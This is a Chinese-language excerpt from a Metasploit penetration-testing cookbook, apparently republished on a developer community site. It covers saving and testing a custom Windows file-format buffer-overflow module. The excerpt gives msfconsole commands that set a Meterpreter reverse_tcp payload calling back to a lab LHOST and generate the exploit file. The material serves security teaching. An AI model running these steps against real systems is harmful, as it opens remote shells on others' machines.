开发者社区> 异步社区> 正文

《Metasploit渗透测试手册》—第8章8.6节移植并测试新的漏洞利用代码模块

简介:
+关注继续查看

本节书摘来自异步社区《Metasploit渗透测试手册》一书中的第8章8.6节移植并测试新的漏洞利用代码模块,作者【印度】Abhinav Singh,更多章节内容可以访问云栖社区“异步社区”公众号查看。

8.6 移植并测试新的漏洞利用代码模块
Metasploit渗透测试手册
在上节中学习了怎样使用可用的概念验证代码开发完整的Metasploit模块,本节中将把该模块保存到合适的位置,并测试其是否正常运转。

准备
了解漏洞利用代码模块要存储的文件夹位置是非常重要的,有助于追踪不同模块所在位置,同时也有助于Metasploit框架理解模块的基本用法。完整的模块脚本构建完成之后,在合适的位置将其保存。

怎样实现
由于上面开发的是漏洞利用代码模块,针对的目标是Windows操作系统,影响的是特定的文件格式,因此可以根据这些信息相应地选择存储位置。查看modules/ exploits/windows目录,可以发现特定的fileformat文件夹,该文件夹用于存储文件格式相关的漏洞利用代码模块,将上面的模块保存为galan_fileformat_bof.rb。

怎样工作
接下来检查该模块功能是否正常,前面我们已经使用过大量的模块,因此这一任务很简单,采用如下步骤。

msf > use exploit/windows/fileformat/galan_fileformat_bof
msf exploit(galan_fileformat_bof) > set PAYLOAD windows/meterpreter/
reverse_tcp
msf exploit(galan_fileformat_bof) > set LHOST 192.168.56.101
msf exploit(galan_fileformat_bof) > exploit

使用exploit命令执行该模块,并创建一个可在目标机器上引发缓冲区溢出的文件。

这样就完成了模块的创建和执行过程,可以看到该过程很简洁,其中较困难的是漏洞利用脚本到Metasploit框架模块的正确转换。用户可以根据需要对现有模块进行调试或修改,也可以向Metasploit社区提交新创建的模块以便与他人分享。

本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
河北稳控科技振弦采集模块VMTool配置工具 快速测试功能
本章演示在计算机上通过 VMTool 工具读取振弦传感器数据。 假设您的计算机已经有至少一个空闲的 COM 接口。
38 0
MyCat - 日志模块 - 测试 | 学习笔记
快速学习 MyCat - 日志模块 - 测试
29 0
测试使用 Context.js 模块|学习笔记
快速学习测试使用 Context.js 模块
43 0
【测试平台开发】十七、接口编辑页面实现下拉级联选择,绑定接口所属模块
【测试平台开发】十七、接口编辑页面实现下拉级联选择,绑定接口所属模块
44 0
网站代码漏洞审计 白盒渗透测试详情
网站白盒渗透测试中要测试的内容非常多,总算赶到了代码审计这一点。期待看过的朋友有一定的感悟,大伙儿通常把代码审计分成黑盒和白盒,大伙儿通常相结合在一起用。平常大家在白盒审计上有多种多样方式,比如一些常见的危险代码函数或执行函数,以及上传漏洞绕过,命令执行反序列化等这些漏洞,总体来讲我们可以梳理为:1.细读全篇 2.追踪.
124 0
渗透测试中php代码漏洞挖掘
国内学习漏洞挖掘的习惯所谓奠定基础,学习各种编程书籍,然后学习漏洞挖掘,问题是不可能控制学习编程的程度。其次,外国学生通常必须学习这一过程,初学者最好不要上手就去搞漏洞挖掘,因为漏洞挖掘需要很多的系统基础知识和一些理论知识做铺垫,而且难度较大,较合理的途径应该从漏洞利用入手,不妨分析一些公开的CVE漏洞。很多漏洞都有比较好的资料,分析研究的多了,对漏洞的认识自然就不同了,然后再去搞挖掘就会易上手一点!俗话说:“磨刀不误砍柴工”,就是这么个理儿。对于有一些基础知识的初学者,应该怎样进行漏洞挖掘呢?
89 0
渗透测试服务 针对CSRF漏洞检测与代码防御办法
XSS跨站以及CSRF攻击,在目前的渗透测试,以及网站漏洞检测中 ,经常的被爆出有高危漏洞,我们SINE安全公司在对客户网站进行渗透测试时,也常有的发现客户网站以及APP存在以上的漏洞,其实CSRF以及XSS跨站很容易被发现以及利用,在收集客户网站域名,以及其他信息的时候,大体的注意一些请求操作,前端输入,get,post请求中,可否插入csrf代码,以及XSS代码。
92 0
网站漏洞扫描 某CMS代码的越权与install.php重置渗透测试漏洞
客户网站前端时间被攻击,网站被劫持到了du博网站上去,通过朋友介绍找到我们做网站的安全防护,我们随即对客户网站进行了全面的渗透测试,包括了网站的漏洞检测与代码安全测试,针对于发现的漏洞进行了修复,包括网站安全部署等等方面,下面我们将这一次的安全应急处理过程分享给有需要的客户。
1577 0
带你读《物联网渗透测试》之三:固件分析与漏洞利用
本书介绍物联网渗透测试的原理和实用技术。主要内容包括IOT威胁建模、固件分析及漏洞利用、嵌入式web应用漏洞、IOT移动应用漏洞、IOT设备攻击、无线电入侵、固件安全和移动安全最佳实践、硬件保护以及IOT高级漏洞的利用与安全自动化。
4456 0
网站安全渗透测试公司对php代码后门分析
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障,安全保障了,网站才能更长远的运行下去。
1199 0
+关注
异步社区
异步社区(www.epubit.com)是人民邮电出版社旗下IT专业图书旗舰社区,也是国内领先的IT专业图书社区,致力于优质学习内容的出版和分享,实现了纸书电子书的同步上架,于2015年8月上线运营。公众号【异步图书】,每日赠送异步新书。
文章
问答
视频
文章排行榜
最热
最新
相关电子书
更多
F2etest — 多浏览器兼容性测试整体解决方案
立即下载
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
相关实验场景
更多